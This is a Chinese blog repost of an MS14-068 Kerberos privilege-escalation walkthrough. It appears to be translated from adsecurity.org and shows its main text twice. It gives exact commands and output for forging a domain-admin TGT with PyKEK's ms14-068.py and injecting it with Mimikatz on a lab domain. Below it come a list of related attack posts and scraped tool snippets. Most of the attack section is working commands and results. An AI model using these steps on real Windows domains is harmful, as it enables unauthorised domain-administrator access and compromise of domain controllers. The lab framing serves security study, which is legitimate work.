j4s0nh4ck
- 浏览: 285057 次
-
文章分类
- 全部博客 (276)
- burp+hydra暴力破解 (1)
- kali linux工具集 (6)
- kali (59)
- linux (54)
- password (14)
- web (63)
- 渗透测试 (50)
- windows (40)
- metasploit (9)
- 信息收集 (32)
- burp suit (4)
- 安全审计 (9)
- https://github.com/secretsquirrel/the-backdoor-factory (0)
- nmap (4)
- arachni (2)
- 工具 (5)
- sql (3)
- 网络 (2)
- 后渗透测试 (10)
- 内网 (5)
- 无线 (2)
- C (3)
- bios (1)
- RoR (12)
- mongodb (1)
- linxu (1)
- gdb (1)
- linux,虚拟化 (1)
- python (4)
最新评论
原文地址:http://adsecurity.org/?p=676
Kerberos漏洞允许攻击者提权域用户成为管理员账户。攻击者可以使用这些权限来访问域中任何机器,包含DC。攻击者必须有一个域口令来进行这种攻击
本文使用MS14-068成功攻击Server 2012 和 2012/R2但是未能成功攻击2008 R2 DC
开始攻击
攻击账户为darthsidious@lab.adsecurity.org,该账户属于域用户和工作站组。假定该用户是网络中授权用户,以及希望获得域管理员权限来进行恶意行为。用户已经获得域账户并且知道密码。
当攻击者获得某台电脑的域口令和本地管理员权限后,他可以利用PyKEK通过与DC进行标准通信来伪造一个TGT。
PyKEK ms14-068.py脚步需要下列信息来声称TGT:
可以通过whoami命令来获得SID
可以在powershell中运行下列命令获得:
第一阶段--生成TGT
生成的TGT Kerberos票据保存在ccache文件中,然后可以使用Mimikatz copy到windows电脑中
c:\Temp\pykek>ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! -s S-1-5-21-1473643419-774954089-222232912
7-1110 -d adsdc02.lab.adsecurity.org
[+] Building AS-REQ for adsdc02.lab.adsecurity.org… Done!
[+] Sending AS-REQ to adsdc02.lab.adsecurity.org… Done!
[+] Receiving AS-REP from adsdc02.lab.adsecurity.org… Done!
[+] Parsing AS-REP from adsdc02.lab.adsecurity.org… Done!
[+] Building TGS-REQ for adsdc02.lab.adsecurity.org… Done!
[+] Sending TGS-REQ to adsdc02.lab.adsecurity.org… Done!
[+] Receiving TGS-REP from adsdc02.lab.adsecurity.org… Done!
[+] Parsing TGS-REP from adsdc02.lab.adsecurity.org… Done!
[+] Creating ccache file ‘TGT_darthsidious@lab.adsecurity.org.ccache’… Done!
接下来使用本地管理员权限登陆电脑来连接到目标DC。
whoami命令显示我是ADSWKWIN7电脑的管理员。
klist显示当前没有Kerberos票据。
PyKEK ms14-068.py脚本把生成的TGT保存到一个ccache文件中(c:\temp\pykek )
第二阶段--注入TGT获得TGS
使用Mimikatz 来注入
c:\Temp\pykek>c:\temp\mimikatz\mimikatz.exe “kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache” exit
.#####. mimikatz 2.0 alpha (x64) release “Kiwi en C” (Nov 20 2014 01:35:45)
.## ^ ##.
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
‘## v ##’ http://blog.gentilkiwi.com/mimikatz (oe.eo)
‘#####’ with 15 modules * * */
mimikatz(commandline) # kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache
Principal : (01) : darthsidious ; @ LAB.ADSECURITY.ORG
Data 0
Start/End/MaxRenew: 12/7/2014 3:10:30 PM ; 12/8/2014 1:10:30 AM ; 12/14/2014 3:10:30 PM
Service Name (01) : krbtgt ; LAB.ADSECURITY.ORG ; @ LAB.ADSECURITY.ORG
Target Name (01) : krbtgt ; LAB.ADSECURITY.ORG ; @ LAB.ADSECURITY.ORG
Client Name (01) : darthsidious ; @ LAB.ADSECURITY.ORG
Flags 50a00000 : pre_authent ; renewable ; proxiable ; forwardable ;
Session Key : 0x00000017 – rc4_hmac_nt
af5e7b47316c4cebae0a7ead04059799
Ticket : 0x00000000 – null ; kvno = 2 […]
* Injecting ticket : OK
mimikatz(commandline) # exit
Bye!
因为我注入一个伪造(声明我是域管理员)的TGT到我的session中,所以当TGT传递到一个未patched的DC,ticket表明我是这些组的成员。
Kerberos漏洞允许攻击者提权域用户成为管理员账户。攻击者可以使用这些权限来访问域中任何机器,包含DC。攻击者必须有一个域口令来进行这种攻击
本文使用MS14-068成功攻击Server 2012 和 2012/R2但是未能成功攻击2008 R2 DC
开始攻击
攻击账户为darthsidious@lab.adsecurity.org,该账户属于域用户和工作站组。假定该用户是网络中授权用户,以及希望获得域管理员权限来进行恶意行为。用户已经获得域账户并且知道密码。
当攻击者获得某台电脑的域口令和本地管理员权限后,他可以利用PyKEK通过与DC进行标准通信来伪造一个TGT。
PyKEK ms14-068.py脚步需要下列信息来声称TGT:
引用
Principal Name (UPN) [-u]: darthsidious@lab.adsecurity.org
Password [-p]: TheEmperor99!
User Security IDentifier (SID) [-s]: S-1-5-21-1473643419-774954089-2222329127-1110
目标Domain Controller [-d]: adsdc02.lab.adsecurity.org
Password [-p]: TheEmperor99!
User Security IDentifier (SID) [-s]: S-1-5-21-1473643419-774954089-2222329127-1110
目标Domain Controller [-d]: adsdc02.lab.adsecurity.org
可以通过whoami命令来获得SID
可以在powershell中运行下列命令获得:
[Security.Principal.WindowsIdentity]::GetCurrent( )
第一阶段--生成TGT
生成的TGT Kerberos票据保存在ccache文件中,然后可以使用Mimikatz copy到windows电脑中
引用
c:\Temp\pykek>ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! -s S-1-5-21-1473643419-774954089-222232912
7-1110 -d adsdc02.lab.adsecurity.org
[+] Building AS-REQ for adsdc02.lab.adsecurity.org… Done!
[+] Sending AS-REQ to adsdc02.lab.adsecurity.org… Done!
[+] Receiving AS-REP from adsdc02.lab.adsecurity.org… Done!
[+] Parsing AS-REP from adsdc02.lab.adsecurity.org… Done!
[+] Building TGS-REQ for adsdc02.lab.adsecurity.org… Done!
[+] Sending TGS-REQ to adsdc02.lab.adsecurity.org… Done!
[+] Receiving TGS-REP from adsdc02.lab.adsecurity.org… Done!
[+] Parsing TGS-REP from adsdc02.lab.adsecurity.org… Done!
[+] Creating ccache file ‘TGT_darthsidious@lab.adsecurity.org.ccache’… Done!
接下来使用本地管理员权限登陆电脑来连接到目标DC。
whoami命令显示我是ADSWKWIN7电脑的管理员。
klist显示当前没有Kerberos票据。
PyKEK ms14-068.py脚本把生成的TGT保存到一个ccache文件中(c:\temp\pykek )
第二阶段--注入TGT获得TGS
使用Mimikatz 来注入
引用
c:\Temp\pykek>c:\temp\mimikatz\mimikatz.exe “kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache” exit
.#####. mimikatz 2.0 alpha (x64) release “Kiwi en C” (Nov 20 2014 01:35:45)
.## ^ ##.
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
‘## v ##’ http://blog.gentilkiwi.com/mimikatz (oe.eo)
‘#####’ with 15 modules * * */
mimikatz(commandline) # kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache
Principal : (01) : darthsidious ; @ LAB.ADSECURITY.ORG
Data 0
Start/End/MaxRenew: 12/7/2014 3:10:30 PM ; 12/8/2014 1:10:30 AM ; 12/14/2014 3:10:30 PM
Service Name (01) : krbtgt ; LAB.ADSECURITY.ORG ; @ LAB.ADSECURITY.ORG
Target Name (01) : krbtgt ; LAB.ADSECURITY.ORG ; @ LAB.ADSECURITY.ORG
Client Name (01) : darthsidious ; @ LAB.ADSECURITY.ORG
Flags 50a00000 : pre_authent ; renewable ; proxiable ; forwardable ;
Session Key : 0x00000017 – rc4_hmac_nt
af5e7b47316c4cebae0a7ead04059799
Ticket : 0x00000000 – null ; kvno = 2 […]
* Injecting ticket : OK
mimikatz(commandline) # exit
Bye!
因为我注入一个伪造(声明我是域管理员)的TGT到我的session中,所以当TGT传递到一个未patched的DC,ticket表明我是这些组的成员。
分享到:
发表评论
-
[图] windows 10
2015-08-18 20:37 306网上下载的图片,忘了来源 -
windows提权集合
2015-06-30 00:23 572https://blog.netspi.com/5-ways- ... -
[转]Access to every PC and become local Admin
2015-06-29 21:50 522原文地址:http://www.gosecure.it/blo ... -
[转]Top Five Ways SpiderLabs Got Domain Admin on Your Internal Network
2015-06-29 21:46 1612原文地址:https://www.trustwave.com/ ... -
[转]如何获得window管理员权限
2015-06-29 21:21 466引用A tutorial on how to get into ... -
Window提权基本步骤
2015-06-03 22:00 768原文地址: http://www.fuzzysecurity. ... -
[转]malware persistence
2015-05-06 23:46 401原文地址:http://jumpespjump.blogspo ... -
[转]backdoor a windows domain
2015-05-06 22:56 492原文地址:http://jumpespjump.blogspo ... -
[译]解密MSSQL密码
2015-03-26 00:43 2863原文地址: https://blog.ne ... -
[转]badsamba
2015-03-20 00:55 318原文地址:http://blog.gdssecurity.co ... -
自动化Man-in-the-Middle SSHv2攻击
2015-03-18 01:26 1036参考:http://www.david-guembel.de/ ... -
window增加硬盘性能方法
2015-02-05 01:03 349参考地址:http://way2h.blogspot.com/ ... -
[译]Skeleton Key Malware & Mimikatz
2015-01-28 20:29 794原文地址: http://adsecurity.org/?p= ... -
绕过PowerShell执行策略的15种方法
2015-01-28 02:27 935https://blog.netspi.com/15-ways ... -
内网工具--LANs.py
2015-01-13 00:01 611下载地址:https://github.com/DanMcIn ... -
[翻译]oledump: Extracting Embedded EXE From DOC
2015-01-04 22:40 935原文地址:http://blog.didierstevens. ... -
[工具]volatility----Windows内存取证
2015-01-04 22:01 1536下载地址:https://github.com/volatil ... -
[译]Windows提权:ahcache.sys/NtApphelpCacheControl
2015-01-03 21:12 1022原文地址:https://code.google.com/p/ ... -
[译]使用Volatility从memory dump获得密码
2014-12-30 12:27 3790原文地址:https://cyberarms.wordpres ... -
vmss2core将VMware镜像转换成memory dump
2014-12-26 23:59 0参考:http://kb.vmware.com/selfser ...
相关推荐
【标题】"ms14-068.exe域内神器" 涉及的主要知识点是Microsoft在2014年发布的安全更新公告MS14-068,它与Windows操作系统中的Kerberos认证漏洞有关。这个漏洞允许攻击者通过精心构造的请求,绕过域控制器的安全验证...
总结,"ms14-068利用工具包.zip" 是一个针对MS14-068漏洞的工具集合,包括可能的漏洞利用程序和一个64位的Kerberos测试环境。这个工具包对安全研究人员和系统管理员来说是重要的资源,他们可以使用这些工具来测试其...
1.python.exe ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.local user-a-1@dom-a.loc位域用户 S-1-5-21-557603841-771695929-1514560438-1103 为账号...
MS14-068漏洞,也被称为"Kerberos金票"漏洞,主要影响Windows Server 2003至2012 R2以及Windows XP至8.1等操作系统。攻击者利用此漏洞可获得域控制器的完全访问权限,进而控制整个网络。因此,及时发现并修复这个...
赠送jar包:apacheds-kerberos-codec-2.0.0-M15.jar; 赠送原API文档:apacheds-kerberos-codec-2.0.0-M15-javadoc.jar; 赠送源代码:apacheds-kerberos-codec-2.0.0-M15-sources.jar; 赠送Maven依赖信息文件:...
赠送jar包:apacheds-kerberos-codec-2.0.0-M15.jar; 赠送原API文档:apacheds-kerberos-codec-2.0.0-M15-javadoc.jar; 赠送源代码:apacheds-kerberos-codec-2.0.0-M15-sources.jar; 包含翻译后的API文档:...
然而,Kerberos也存在一些潜在的弱点,例如对密码安全性的依赖,以及可能的中间人攻击,因此在实际部署中需要结合其他安全措施共同使用。 总的来说,理解和掌握Kerberos协议对于网络管理员、系统安全专家以及进行域...
- 如果存在该漏洞,则可以通过上传Mimikatz和MS14-068 Exploit工具进行攻击。 3. **执行Exploit** - 使用MS14-068 Exploit工具,输入相应的参数(如用户名、密码、SID和域控制器IP),成功后生成证书文件。 - ...
目前,仅实现了少数功能(以相当快速的方式)来利用 MS14-068 (CVE-2014-6324) 。 更多来了…… 作者 西尔万·蒙内 联系人:solucom dot fr 的 sylvain dot monne 图书馆内容 kek.krb5:Kerberos V5 ( ) ASN.1 ...
离线安装包,亲测可用
【标题】:“域渗透工具包”是指一组专门用于在Windows操作系统环境下进行域权限提升和攻击的工具,主要包括mimikatz、psexec以及ms14-068漏洞利用工具。 【描述】:在网络安全领域,域渗透是攻击者试图获取对...
Kerberos-The-Definitive-Guide.chm
Kerberos权威指南 ,Kerberos The Definitive Guide。Single sign-on is the holy grail of network administration, and Kerberos is the only game in town. Microsoft, by integrating Kerberos into Active ...
除了SYSVOL与GPP漏洞外,活动目录还面临其他安全威胁,如MS14-068漏洞。活动目录使用Kerberos协议作为身份验证机制,攻击者可以利用该漏洞获取TGT(Ticket Granting Ticket),进而冒充用户获取访问权限。微软针对MS...
安装kerberos5时需要的rpm包,版本1.15.1-37.el7_6.x86_64。里面4个文件:krb5-libs-1.15.1-37.el7_6.x86_64.rpm;krb5-server-1.15.1-37.el7_6.x86_64.rpm;krb5-workstation-1.15.1-37.el7_6.x86_64.rpm;libkadm5...
此外,MS14-068漏洞利用(如案例3所示)通常结合Kekeo工具和本地执行的命令来完成PTT攻击,通过清理凭证、伪造新的Kerberos票证,进而获得高权限。 总的来说,理解这些攻击方式对于防御者来说至关重要,他们需要...
该协议基于密钥分发中心(KDC),确保了通信双方的身份,并提供了会话的加密,防止中间人攻击。现在,我们将详细探讨如何搭建Kerberos环境。 1. **Kerberos基本原理**: Kerberos基于票据授权票证(Ticket-...
Kerberos rpm安装部署包,包含krb5-auth-dialog-0.13-6.el6.x86_64.rpm、python-krbV-1.0.90-3.el6.x86_64.rpm、krb5-workstation-1.10.3-65.el6.x86_64.rpm等9个rpm包
《Kerberos认证协议详解——基础篇》 Kerberos是一种强大的网络认证协议,它为用户提供了一种安全的身份验证方式,确保在网络通信中只有合法的用户可以访问资源。本篇文章将深入探讨Kerberos的基本原理、工作流程...
样本可以在spring-security-kerberos-samples 。 有关更多信息,请查阅参考文档。 从源头建造 Spring Security Kerberos使用基于的构建系统。 在下面的说明中,。/ 是从源树的根调用的,并用作构建的跨平台,自包含...